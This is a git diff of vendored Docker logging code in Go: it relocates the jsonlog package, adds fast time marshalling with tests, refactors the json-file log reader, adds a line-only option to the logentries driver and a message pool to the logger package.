+++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlog.go
@@ -0,0 +1,25 @@
+package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog"
+
+import (
+	"time"
+)
+
+// JSONLog is a log message, typically a single entry from a given log stream.
+type JSONLog struct {
+	// Log is the log message
+	Log string `json:"log,omitempty"`
+	// Stream is the log source
+	Stream string `json:"stream,omitempty"`
+	// Created is the created timestamp of log
+	Created time.Time `json:"time"`
+	// Attrs is the list of extra attributes provided by the user
+	Attrs map[string]string `json:"attrs,omitempty"`
+}
+
+// Reset all fields to their zero value.
+func (jl *JSONLog) Reset() {
+	jl.Log = ""
+	jl.Stream = ""
+	jl.Created = time.Time{}
+	jl.Attrs = make(map[string]string)
+}
diff --git a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes.go
similarity index 76%
rename from vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go
rename to vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes.go
index df522c0d66..577c718f63 100644
--- a/vendor/github.com/docker/docker/pkg/jsonlog/jsonlogbytes.go
+++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes.go
@@ -1,25 +1,24 @@
-package jsonlog
+package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog"
 
 import (
 	"bytes"
 	"encoding/json"
+	"time"
 	"unicode/utf8"
 )
 
-// JSONLogs is based on JSONLog.
-// It allows marshalling JSONLog from Log as []byte
-// and an already marshalled Created timestamp.
+// JSONLogs marshals encoded JSONLog objects
 type JSONLogs struct {
-	Log     []byte `json:"log,omitempty"`
-	Stream  string `json:"stream,omitempty"`
-	Created string `json:"time"`
+	Log     []byte    `json:"log,omitempty"`
+	Stream  string    `json:"stream,omitempty"`
+	Created time.Time `json:"time"`
 
 	// json-encoded bytes
 	RawAttrs json.RawMessage `json:"attrs,omitempty"`
 }
 
-// MarshalJSONBuf is based on the same method from JSONLog
-// It has been modified to take into account the necessary changes.
+// MarshalJSONBuf is an optimized JSON marshaller that avoids reflection
+// and unnecessary allocation.
 func (mj *JSONLogs) MarshalJSONBuf(buf *bytes.Buffer) error {
 	var first = true
 
@@ -30,13 +29,13 @@ func (mj *JSONLogs) MarshalJSONBuf(buf *bytes.Buffer) error {
 		ffjsonWriteJSONBytesAsString(buf, mj.Log)
 	}
 	if len(mj.Stream) != 0 {
-		if first == true {
+		if first {
 			first = false
 		} else {
 			buf.WriteString(`,`)
 		}
 		buf.WriteString(`"stream":`)
-		ffjsonWriteJSONString(buf, mj.Stream)
+		ffjsonWriteJSONBytesAsString(buf, []byte(mj.Stream))
 	}
 	if len(mj.RawAttrs) > 0 {
 		if first {
@@ -50,14 +49,18 @@ func (mj *JSONLogs) MarshalJSONBuf(buf *bytes.Buffer) error {
 	if !first {
 		buf.WriteString(`,`)
 	}
+
+	created, err := fastTimeMarshalJSON(mj.Created)
+	if err != nil {
+		return err
+	}
+
 	buf.WriteString(`"time":`)
-	buf.WriteString(mj.Created)
+	buf.WriteString(created)
 	buf.WriteString(`}`)
 	return nil
 }
 
-// This is based on ffjsonWriteJSONBytesAsString. It has been changed
-// to accept a string passed as a slice of bytes.
 func ffjsonWriteJSONBytesAsString(buf *bytes.Buffer, s []byte) {
 	const hex = "0123456789abcdef"
 
diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes_test.go
new file mode 100644
index 0000000000..d268db4df0
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/jsonlogbytes_test.go
@@ -0,0 +1,51 @@
+package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog"
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"regexp"
+	"testing"
+	"time"
+
+	"gotest.tools/assert"
+)
+
+func TestJSONLogsMarshalJSONBuf(t *testing.T) {
+	logs := map[*JSONLogs]string{
+		{Log: []byte(`"A log line with \\"`)}:                  `^{\"log\":\"\\\"A log line with \\\\\\\\\\\"\",\"time\":`,
+		{Log: []byte("A log line")}:                            `^{\"log\":\"A log line\",\"time\":`,
+		{Log: []byte("A log line with \r")}:                    `^{\"log\":\"A log line with \\r\",\"time\":`,
+		{Log: []byte("A log line with & < >")}:                 `^{\"log\":\"A log line with \\u0026 \\u003c \\u003e\",\"time\":`,
+		{Log: []byte("A log line with utf8 : 🚀 ψ ω β")}:        `^{\"log\":\"A log line with utf8 : 🚀 ψ ω β\",\"time\":`,
+		{Stream: "stdout"}:                                     `^{\"stream\":\"stdout\",\"time\":`,
+		{Stream: "stdout", Log: []byte("A log line")}:          `^{\"log\":\"A log line\",\"stream\":\"stdout\",\"time\":`,
+		{Created: time.Date(2017, 9, 1, 1, 1, 1, 1, time.UTC)}: `^{\"time\":"2017-09-01T01:01:01.000000001Z"}$`,
+
+		{}: `^{\"time\":"0001-01-01T00:00:00Z"}$`,
+		// These ones are a little weird
+		{Log: []byte("\u2028 \u2029")}: `^{\"log\":\"\\u2028 \\u2029\",\"time\":`,
+		{Log: []byte{0xaF}}:            `^{\"log\":\"\\ufffd\",\"time\":`,
+		{Log: []byte{0x7F}}:            `^{\"log\":\"\x7f\",\"time\":`,
+		// with raw attributes
+		{Log: []byte("A log line"), RawAttrs: []byte(`{"hello":"world","value":1234}`)}: `^{\"log\":\"A log line\",\"attrs\":{\"hello\":\"world\",\"value\":1234},\"time\":`,
+		// with Tag set
+		{Log: []byte("A log line with tag"), RawAttrs: []byte(`{"hello":"world","value":1234}`)}: `^{\"log\":\"A log line with tag\",\"attrs\":{\"hello\":\"world\",\"value\":1234},\"time\":`,
+	}
+	for jsonLog, expression := range logs {
+		var buf bytes.Buffer
+		err := jsonLog.MarshalJSONBuf(&buf)
+		assert.NilError(t, err)
+
+		assert.Assert(t, regexP(buf.String(), expression))
+		assert.NilError(t, json.Unmarshal(buf.Bytes(), &map[string]interface{}{}))
+	}
+}
+
+func regexP(value string, pattern string) func() (bool, string) {
+	return func() (bool, string) {
+		re := regexp.MustCompile(pattern)
+		msg := fmt.Sprintf("%q did not match pattern %q", value, pattern)
+		return re.MatchString(value), msg
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling.go
new file mode 100644
index 0000000000..1822ea5dbc
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling.go
@@ -0,0 +1,20 @@
+package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog"
+
+import (
+	"time"
+
+	"github.com/pkg/errors"
+)
+
+const jsonFormat = `"` + time.RFC3339Nano + `"`
+
+// fastTimeMarshalJSON avoids one of the extra allocations that
+// time.MarshalJSON is making.
+func fastTimeMarshalJSON(t time.Time) (string, error) {
+	if y := t.Year(); y < 0 || y >= 10000 {
+		// RFC 3339 is clear that years are 4 digits exactly.
+		// See golang.org/issue/4556#c15 for more discussion.
+		return "", errors.New("time.MarshalJSON: year outside of range [0,9999]")
+	}
+	return t.Format(jsonFormat), nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling_test.go
new file mode 100644
index 0000000000..b3959b0467
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog/time_marshalling_test.go
@@ -0,0 +1,34 @@
+package jsonlog // import "github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog"
+
+import (
+	"testing"
+	"time"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestFastTimeMarshalJSONWithInvalidYear(t *testing.T) {
+	aTime := time.Date(-1, 1, 1, 0, 0, 0, 0, time.Local)
+	_, err := fastTimeMarshalJSON(aTime)
+	assert.Check(t, is.ErrorContains(err, "year outside of range"))
+
+	anotherTime := time.Date(10000, 1, 1, 0, 0, 0, 0, time.Local)
+	_, err = fastTimeMarshalJSON(anotherTime)
+	assert.Check(t, is.ErrorContains(err, "year outside of range"))
+}
+
+func TestFastTimeMarshalJSON(t *testing.T) {
+	aTime := time.Date(2015, 5, 29, 11, 1, 2, 3, time.UTC)
+	json, err := fastTimeMarshalJSON(aTime)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal("\"2015-05-29T11:01:02.000000003Z\"", json))
+
+	location, err := time.LoadLocation("Europe/Paris")
+	assert.NilError(t, err)
+
+	aTime = time.Date(2015, 5, 29, 11, 1, 2, 3, location)
+	json, err = fastTimeMarshalJSON(aTime)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal("\"2015-05-29T11:01:02.000000003+02:00\"", json))
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go
index f2f9df1887..ab1793bb72 100644
--- a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go
+++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read.go
@@ -1,41 +1,16 @@
-package jsonfilelog
+package jsonfilelog // import "github.com/docker/docker/daemon/logger/jsonfilelog"
 
 import (
-	"bytes"
 	"encoding/json"
-	"errors"
-	"fmt"
 	"io"
-	"os"
-	"time"
 
-	"github.com/fsnotify/fsnotify"
-	"golang.org/x/net/context"
-
-	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/daemon/logger"
-	"github.com/docker/docker/pkg/filenotify"
-	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/pkg/jsonlog"
-	"github.com/docker/docker/pkg/tailfile"
+	"github.com/docker/docker/daemon/logger/jsonfilelog/jsonlog"
 )
 
 const maxJSONDecodeRetry = 20000
 
-func decodeLogLine(dec *json.Decoder, l *jsonlog.JSONLog) (*logger.Message, error) {
-	l.Reset()
-	if err := dec.Decode(l); err != nil {
-		return nil, err
-	}
-	msg := &logger.Message{
-		Source:    l.Stream,
-		Timestamp: l.Created,
-		Line:      []byte(l.Log),
-		Attrs:     l.Attrs,
-	}
-	return msg, nil
-}
-
 // ReadLogs implements the logger's LogReader interface for the logs
 // created by this driver.
 func (l *JSONFileLogger) ReadLogs(config logger.ReadConfig) *logger.LogWatcher {
@@ -45,275 +20,70 @@ func (l *JSONFileLogger) ReadLogs(config logger.ReadConfig) *logger.LogWatcher {
 	return logWatcher
 }
 
-func (l *JSONFileLogger) readLogs(logWatcher *logger.LogWatcher, config logger.ReadConfig) {
-	defer close(logWatcher.Msg)
+func (l *JSONFileLogger) readLogs(watcher *logger.LogWatcher, config logger.ReadConfig) {
+	defer close(watcher.Msg)
 
-	// lock so the read stream doesn't get corrupted due to rotations or other log data written while we read
-	// This will block writes!!!
 	l.mu.Lock()
-
-	pth := l.writer.LogPath()
-	var files []io.ReadSeeker
-	for i := l.writer.MaxFiles(); i > 1; i-- {
-		f, err := os.Open(fmt.Sprintf("%s.%d", pth, i-1))
-		if err != nil {
-			if !os.IsNotExist(err) {
-				logWatcher.Err <- err
-				break
-			}
-			continue
-		}
-		defer f.Close()
-
-		files = append(files, f)
-	}
-
-	latestFile, err := os.Open(pth)
-	if err != nil {
-		logWatcher.Err <- err
-		l.mu.Unlock()
-		return
-	}
-	defer latestFile.Close()
-
-	if config.Tail != 0 {
-		tailer := ioutils.MultiReadSeeker(append(files, latestFile)...)
-		tailFile(tailer, logWatcher, config.Tail, config.Since)
-	}
-
-	// close all the rotated files
-	for _, f := range files {
-		if err := f.(io.Closer).Close(); err != nil {
-			logrus.WithField("logger", "json-file").Warnf("error closing tailed log file: %v", err)
-		}
-	}
-
-	if !config.Follow {
-		if err := latestFile.Close(); err != nil {
-			logrus.Errorf("Error closing file: %v", err)
-		}
-		l.mu.Unlock()
-		return
-	}
-
-	if config.Tail >= 0 {
-		latestFile.Seek(0, os.SEEK_END)
-	}
-
-	l.readers[logWatcher] = struct{}{}
+	l.readers[watcher] = struct{}{}
 	l.mu.Unlock()
 
-	notifyRotate := l.writer.NotifyRotate()
-	followLogs(latestFile, logWatcher, notifyRotate, config.Since)
+	l.writer.ReadLogs(config, watcher)
 
 	l.mu.Lock()
-	delete(l.readers, logWatcher)
+	delete(l.readers, watcher)
 	l.mu.Unlock()
-
-	l.writer.NotifyRotateEvict(notifyRotate)
 }
 
-func tailFile(f io.ReadSeeker, logWatcher *logger.LogWatcher, tail int, since time.Time) {
-	var rdr io.Reader
-	rdr = f
-	if tail > 0 {
-		ls, err := tailfile.TailFile(f, tail)
-		if err != nil {
-			logWatcher.Err <- err
-			return
-		}
-		rdr = bytes.NewBuffer(bytes.Join(ls, []byte("\n")))
-	}
-	dec := json.NewDecoder(rdr)
-	l := &jsonlog.JSONLog{}
-	for {
-		msg, err := decodeLogLine(dec, l)
-		if err != nil {
-			if err != io.EOF {
-				logWatcher.Err <- err
-			}
-			return
-		}
-		if !since.IsZero() && msg.Timestamp.Before(since) {
-			continue
-		}
-		logWatcher.Msg <- msg
-	}
-}
-
-func watchFile(name string) (filenotify.FileWatcher, error) {
-	fileWatcher, err := filenotify.New()
-	if err != nil {
+func decodeLogLine(dec *json.Decoder, l *jsonlog.JSONLog) (*logger.Message, error) {
+	l.Reset()
+	if err := dec.Decode(l); err != nil {
 		return nil, err
 	}
 
-	if err := fileWatcher.Add(name); err != nil {
-		logrus.WithField("logger", "json-file").Warnf("falling back to file poller due to error: %v", err)
-		fileWatcher.Close()
-		fileWatcher = filenotify.NewPollingWatcher()
-
-		if err := fileWatcher.Add(name); err != nil {
-			fileWatcher.Close()
-			logrus.Debugf("error watching log file for modifications: %v", err)
-			return nil, err
+	var attrs []backend.LogAttr
+	if len(l.Attrs) != 0 {
+		attrs = make([]backend.LogAttr, 0, len(l.Attrs))
+		for k, v := range l.Attrs {
+			attrs = append(attrs, backend.LogAttr{Key: k, Value: v})
 		}
 	}
-	return fileWatcher, nil
+	msg := &logger.Message{
+		Source:    l.Stream,
+		Timestamp: l.Created,
+		Line:      []byte(l.Log),
+		Attrs:     attrs,
+	}
+	return msg, nil
 }
 
-func followLogs(f *os.File, logWatcher *logger.LogWatcher, notifyRotate chan interface{}, since time.Time) {
-	dec := json.NewDecoder(f)
+// decodeFunc is used to create a decoder for the log file reader
+func decodeFunc(rdr io.Reader) func() (*logger.Message, error) {
 	l := &jsonlog.JSONLog{}
-
-	name := f.Name()
-	fileWatcher, err := watchFile(name)
-	if err != nil {
-		logWatcher.Err <- err
-		return
-	}
-	defer func() {
-		f.Close()
-		fileWatcher.Remove(name)
-		fileWatcher.Close()
-	}()
-
-	ctx, cancel := context.WithCancel(context.Background())
-	defer cancel()
-	go func() {
-		select {
-		case <-logWatcher.WatchClose():
-			fileWatcher.Remove(name)
-			cancel()
-		case <-ctx.Done():
-			return
-		}
-	}()
-
-	var retries int
-	handleRotate := func() error {
-		f.Close()
-		fileWatcher.Remove(name)
-
-		// retry when the file doesn't exist
-		for retries := 0; retries <= 5; retries++ {
-			f, err = os.Open(name)
-			if err == nil || !os.IsNotExist(err) {
+	dec := json.NewDecoder(rdr)
+	return func() (msg *logger.Message, err error) {
+		for retries := 0; retries < maxJSONDecodeRetry; retries++ {
+			msg, err = decodeLogLine(dec, l)
+			if err == nil {
 				break
 			}
-		}
-		if err != nil {
-			return err
-		}
-		if err := fileWatcher.Add(name); err != nil {
-			return err
-		}
-		dec = json.NewDecoder(f)
-		return nil
-	}
 
-	errRetry := errors.New("retry")
-	errDone := errors.New("done")
-	waitRead := func() error {
-		select {
-		case e := <-fileWatcher.Events():
-			switch e.Op {
-			case fsnotify.Write:
-				dec = json.NewDecoder(f)
-				return nil
-			case fsnotify.Rename, fsnotify.Remove:
-				select {
-				case <-notifyRotate:
-				case <-ctx.Done():
-					return errDone
-				}
-				if err := handleRotate(); err != nil {
-					return err
-				}
-				return nil
-			}
-			return errRetry
-		case err := <-fileWatcher.Errors():
-			logrus.Debug("logger got error watching file: %v", err)
-			// Something happened, let's try and stay alive and create a new watcher
-			if retries <= 5 {
-				fileWatcher.Close()
-				fileWatcher, err = watchFile(name)
-				if err != nil {
-					return err
-				}
+			// try again, could be due to a an incomplete json object as we read
+			if _, ok := err.(*json.SyntaxError); ok {
+				dec = json.NewDecoder(rdr)
 				retries++
-				return errRetry
+				continue
 			}
-			return err
-		case <-ctx.Done():
-			return errDone
-		}
-	}
 
-	handleDecodeErr := func(err error) error {
-		if err == io.EOF {
-			for err := waitRead(); err != nil; {
-				if err == errRetry {
-					// retry the waitRead
-					continue
-				}
-				return err
-			}
-			return nil
-		}
-		// try again because this shouldn't happen
-		if _, ok := err.(*json.SyntaxError); ok && retries <= maxJSONDecodeRetry {
-			dec = json.NewDecoder(f)
-			retries++
-			return nil
-		}
-		// io.ErrUnexpectedEOF is returned from json.Decoder when there is
-		// remaining data in the parser's buffer while an io.EOF occurs.
-		// If the json logger writes a partial json log entry to the disk
-		// while at the same time the decoder tries to decode it, the race condition happens.
-		if err == io.ErrUnexpectedEOF && retries <= maxJSONDecodeRetry {
-			reader := io.MultiReader(dec.Buffered(), f)
-			dec = json.NewDecoder(reader)
-			retries++
-			return nil
-		}
-		return err
-	}
-
-	// main loop
-	for {
-		msg, err := decodeLogLine(dec, l)
-		if err != nil {
-			if err := handleDecodeErr(err); err != nil {
-				if err == errDone {
-					return
-				}
-				// we got an unrecoverable error, so return
-				logWatcher.Err <- err
-				return
-			}
-			// ready to try again
-			continue
-		}
-
-		retries = 0 // reset retries since we've succeeded
-		if !since.IsZero() && msg.Timestamp.Before(since) {
-			continue
-		}
-		select {
-		case logWatcher.Msg <- msg:
-		case <-ctx.Done():
-			logWatcher.Msg <- msg
-			for {
-				msg, err := decodeLogLine(dec, l)
-				if err != nil {
-					return
-				}
-				if !since.IsZero() && msg.Timestamp.Before(since) {
-					continue
-				}
-				logWatcher.Msg <- msg
+			// io.ErrUnexpectedEOF is returned from json.Decoder when there is
+			// remaining data in the parser's buffer while an io.EOF occurs.
+			// If the json logger writes a partial json log entry to the disk
+			// while at the same time the decoder tries to decode it, the race condition happens.
+			if err == io.ErrUnexpectedEOF {
+				reader := io.MultiReader(dec.Buffered(), rdr)
+				dec = json.NewDecoder(reader)
+				retries++
 			}
 		}
+		return msg, err
 	}
 }
diff --git a/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read_test.go b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read_test.go
new file mode 100644
index 0000000000..cad8003e5e
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/logger/jsonfilelog/read_test.go
@@ -0,0 +1,64 @@
+package jsonfilelog // import "github.com/docker/docker/daemon/logger/jsonfilelog"
+
+import (
+	"bytes"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/daemon/logger"
+	"gotest.tools/assert"
+	"gotest.tools/fs"
+)
+
+func BenchmarkJSONFileLoggerReadLogs(b *testing.B) {
+	tmp := fs.NewDir(b, "bench-jsonfilelog")
+	defer tmp.Remove()
+
+	jsonlogger, err := New(logger.Info{
+		ContainerID: "a7317399f3f857173c6179d44823594f8294678dea9999662e5c625b5a1c7657",
+		LogPath:     tmp.Join("container.log"),
+		Config: map[string]string{
+			"labels": "first,second",
+		},
+		ContainerLabels: map[string]string{
+			"first":  "label_value",
+			"second": "label_foo",
+		},
+	})
+	assert.NilError(b, err)
+	defer jsonlogger.Close()
+
+	msg := &logger.Message{
+		Line:      []byte("Line that thinks that it is log line from docker\n"),
+		Source:    "stderr",
+		Timestamp: time.Now().UTC(),
+	}
+
+	buf := bytes.NewBuffer(nil)
+	assert.NilError(b, marshalMessage(msg, nil, buf))
+	b.SetBytes(int64(buf.Len()))
+
+	b.ResetTimer()
+
+	chError := make(chan error, b.N+1)
+	go func() {
+		for i := 0; i < b.N; i++ {
+			chError <- jsonlogger.Log(msg)
+		}
+		chError <- jsonlogger.Close()
+	}()
+
+	lw := jsonlogger.(*JSONFileLogger).ReadLogs(logger.ReadConfig{Follow: true})
+	watchClose := lw.WatchClose()
+	for {
+		select {
+		case <-lw.Msg:
+		case <-watchClose:
+			return
+		case err := <-chError:
+			if err != nil {
+				b.Fatal(err)
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go b/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go
index e794b1ed08..70a8baf66e 100644
--- a/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go
+++ b/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go
@@ -1,13 +1,15 @@
 // Package logentries provides the log driver for forwarding server logs
 // to logentries endpoints.
-package logentries
+package logentries // import "github.com/docker/docker/daemon/logger/logentries"
 
 import (
 	"fmt"
+	"strconv"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/bsphere/le_go"
 	"github.com/docker/docker/daemon/logger"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 type logentries struct {
@@ -16,11 +18,13 @@ type logentries struct {
 	containerName string
 	writer        *le_go.Logger
 	extra         map[string]string
+	lineOnly      bool
 }
 
 const (
-	name  = "logentries"
-	token = "logentries-token"
+	name     = "logentries"
+	token    = "logentries-token"
+	lineonly = "line-only"
 )
 
 func init() {
@@ -35,33 +39,49 @@ func init() {
 // New creates a logentries logger using the configuration passed in on
 // the context. The supported context configuration variable is
 // logentries-token.
-func New(ctx logger.Context) (logger.Logger, error) {
-	logrus.WithField("container", ctx.ContainerID).
-		WithField("token", ctx.Config[token]).
+func New(info logger.Info) (logger.Logger, error) {
+	logrus.WithField("container", info.ContainerID).
+		WithField("token", info.Config[token]).
+		WithField("line-only", info.Config[lineonly]).
 		Debug("logging driver logentries configured")
 
-	log, err := le_go.Connect(ctx.Config[token])
+	log, err := le_go.Connect(info.Config[token])
 	if err != nil {
-		return nil, err
+		return nil, errors.Wrap(err, "error connecting to logentries")
+	}
+	var lineOnly bool
+	if info.Config[lineonly] != "" {
+		if lineOnly, err = strconv.ParseBool(info.Config[lineonly]); err != nil {
+			return nil, errors.Wrap(err, "error parsing lineonly option")
+		}
 	}
 	return &logentries{
-		containerID:   ctx.ContainerID,
-		containerName: ctx.ContainerName,
+		containerID:   info.ContainerID,
+		containerName: info.ContainerName,
 		writer:        log,
+		lineOnly:      lineOnly,
 	}, nil
 }
 
 func (f *logentries) Log(msg *logger.Message) error {
-	data := map[string]string{
-		"container_id":   f.containerID,
-		"container_name": f.containerName,
-		"source":         msg.Source,
-		"log":            string(msg.Line),
-	}
-	for k, v := range f.extra {
-		data[k] = v
+	if !f.lineOnly {
+		data := map[string]string{
+			"container_id":   f.containerID,
+			"container_name": f.containerName,
+			"source":         msg.Source,
+			"log":            string(msg.Line),
+		}
+		for k, v := range f.extra {
+			data[k] = v
+		}
+		ts := msg.Timestamp
+		logger.PutMessage(msg)
+		f.writer.Println(f.tag, ts, data)
+	} else {
+		line := string(msg.Line)
+		logger.PutMessage(msg)
+		f.writer.Println(line)
 	}
-	f.writer.Println(f.tag, msg.Timestamp, data)
 	return nil
 }
 
@@ -78,6 +98,7 @@ func ValidateLogOpt(cfg map[string]string) error {
 	for key := range cfg {
 		switch key {
 		case "env":
+		case "env-regex":
 		case "labels":
 		case "tag":
 		case key:
diff --git a/vendor/github.com/docker/docker/daemon/logger/logger.go b/vendor/github.com/docker/docker/daemon/logger/logger.go
index d091997358..912e855c7f 100644
--- a/vendor/github.com/docker/docker/daemon/logger/logger.go
+++ b/vendor/github.com/docker/docker/daemon/logger/logger.go
@@ -5,78 +5,70 @@
 // factory, which holds the contextual instance information that
 // allows multiple loggers of the same type to perform different
 // actions, such as logging to different locations.
-package logger
+package logger // import "github.com/docker/docker/daemon/logger"
 
 import (
-	"errors"
-	"sort"
-	"strings"
 	"sync"
 	"time"
 
-	"github.com/docker/docker/pkg/jsonlog"
+	"github.com/docker/docker/api/types/backend"
 )
 
-// ErrReadLogsNotSupported is returned when the logger does not support reading logs.
-var ErrReadLogsNotSupported = errors.New("configured logging reader does not support reading")
+// ErrReadLogsNotSupported is returned when the underlying log driver does not support reading
+type ErrReadLogsNotSupported struct{}
+
+func (ErrReadLogsNotSupported) Error() string {
+	return "configured logging driver does not support reading"
+}
+
+// NotImplemented makes this error implement the `NotImplemented` interface from api/errdefs
+func (ErrReadLogsNotSupported) NotImplemented() {}
 
 const (
-	// TimeFormat is the time format used for timestamps sent to log readers.
-	TimeFormat           = jsonlog.RFC3339NanoFixed
 	logWatcherBufferSize = 4096
 )
 
-// Message is datastructure that represents piece of output produced by some
-// container.  The Line member is a slice of an array whose contents can be
-// changed after a log driver's Log() method returns.
-type Message struct {
-	Line      []byte
-	Source    string
-	Timestamp time.Time
-	Attrs     LogAttributes
-	Partial   bool
-}
+var messagePool = &sync.Pool{New: func() interface{} { return &Message{Line: make([]byte, 0, 256)} }}
 
-// CopyMessage creates a copy of the passed-in Message which will remain
-// unchanged if the original is changed.  Log drivers which buffer Messages
-// rather than dispatching them during their Log() method should use this
-// function to obtain a Message whose Line member's contents won't change.
-func CopyMessage(msg *Message) *Message {
-	m := new(Message)
-	m.Line = make([]byte, len(msg.Line))
-	copy(m.Line, msg.Line)
-	m.Source = msg.Source
-	m.Timestamp = msg.Timestamp
-	m.Partial = msg.Partial
-	m.Attrs = make(LogAttributes)
-	for k, v := range msg.Attrs {
-		m.Attrs[k] = v
-	}
-	return m
+// NewMessage returns a new message from the message sync.Pool
+func NewMessage() *Message {
+	return messagePool.Get().(*Message)
 }
 
-// LogAttributes is used to hold the extra attributes available in the log message
-// Primarily used for converting the map type to string and sorting.
-type LogAttributes map[string]string
-type byKey []string
-
-func (s byKey) Len() int { return len(s) }
-func (s byKey) Less(i, j int) bool {
-	keyI := strings.Split(s[i], "=")
-	keyJ := strings.Split(s[j], "=")
-	return keyI[0] < keyJ[0]
+// PutMessage puts the specified message back n the message pool.
+// The message fields are reset before putting into the pool.
+func PutMessage(msg *Message) {
+	msg.reset()
+	messagePool.Put(msg)
 }
-func (s byKey) Swap(i, j int) {
-	s[i], s[j] = s[j], s[i]
+
+// Message is data structure that represents piece of output produced by some
+// container.  The Line member is a slice of an array whose contents can be
+// changed after a log driver's Log() method returns.
+//
+// Message is subtyped from backend.LogMessage because there is a lot of
+// internal complexity around the Message type that should not be exposed
+// to any package not explicitly importing the logger type.
+//
+// Any changes made to this struct must also be updated in the `reset` function
+type Message backend.LogMessage
+
+// reset sets the message back to default values
+// This is used when putting a message back into the message pool.
+// Any changes to the `Message` struct should be reflected here.
+func (m *Message) reset() {
+	m.Line = m.Line[:0]
+	m.Source = ""
+	m.Attrs = nil
+	m.PLogMetaData = nil
+
+	m.Err = nil
 }
 
-func (a LogAttributes) String() string {
-	var ss byKey
-	for k, v := range a {
-		ss = append(ss, k+"="+v)
-	}
-	sort.Sort(ss)
-	return strings.Join(ss, ",")
+// AsLogMessage returns a pointer to the message as a pointer to
+// backend.LogMessage, which is an identical type with a different purpose
+func (m *Message) AsLogMessage() *backend.LogMessage {
+	return (*backend.LogMessage)(m)
 }
 
 // Logger is the interface for docker logging drivers.
@@ -86,9 +78,17 @@ type Logger interface {
 	Close() error
 }
 
+// SizedLogger is the interface for logging drivers that can control
+// the size of buffer used for their messages.
+type SizedLogger interface {
+	Logger
+	BufSize() int
+}
+
 // ReadConfig is the configuration passed into ReadLogs.
 type ReadConfig struct {
 	Since  time.Time
+	Until  time.Time
 	Tail   int
 	Follow bool
 }
@@ -132,3 +132,14 @@ func (w *LogWatcher) Close() {
 func (w *LogWatcher) WatchClose() <-chan struct{} {
 	return w.closeNotifier
 }
+
+// Capability defines the list of capabilities that a driver can implement
+// These capabilities are not required to be a logging driver, however do
+// determine how a logging driver can be used
+type Capability struct {
+	// Determines if a log driver can read back logs
+	ReadLogs bool
+}
+
+// MarshalFunc is a func that marshals a message into an arbitrary format
+type MarshalFunc func(*Message) ([]byte, error)
diff --git a/vendor/github.com/docker/docker/daemon/logger/logger_test.go b/vendor/github.com/docker/docker/daemon/logger/logger_test.go
index 16e1514d2d..eaeec24085 100644
--- a/vendor/github.com/docker/docker/daemon/logger/logger_test.go
+++ b/vendor/github.com/docker/docker/daemon/logger/logger_test.go
@@ -1,26 +1,21 @@
-package logger
+package logger // import "github.com/docker/docker/daemon/logger"
 
 import (
-	"reflect"
-	"testing"
-	"time"
+	"github.com/docker/docker/api/types/backend"
 )
 
-func TestCopyMessage(t *testing.T) {
+func (m *Message) copy() *Message {
 	msg := &Message{
-		Line:      []byte("test line."),
-		Source:    "stdout",
-		Timestamp: time.Now(),
-		Attrs: LogAttributes{
-			"key1": "val1",
-			"key2": "val2",
-			"key3": "val3",
-		},
-		Partial: true,
+		Source:       m.Source,
+		PLogMetaData: m.PLogMetaData,
+		Timestamp:    m.Timestamp,
 	}
 
-	m := CopyMessage(msg)
-	if !reflect.DeepEqual(m, msg) {
-		t.Fatalf("CopyMessage failed to copy message")
+	if m.Attrs != nil {
+		msg.Attrs = make([]backend.LogAttr, len(m.Attrs))
+		copy(msg.Attrs, m.Attrs)
 	}
+
+	msg.Line = append(make([]byte, 0, len(m.Line)), m.Line...)
+	return msg
 }
diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go
index 4752679c72..719512dbdb 100644
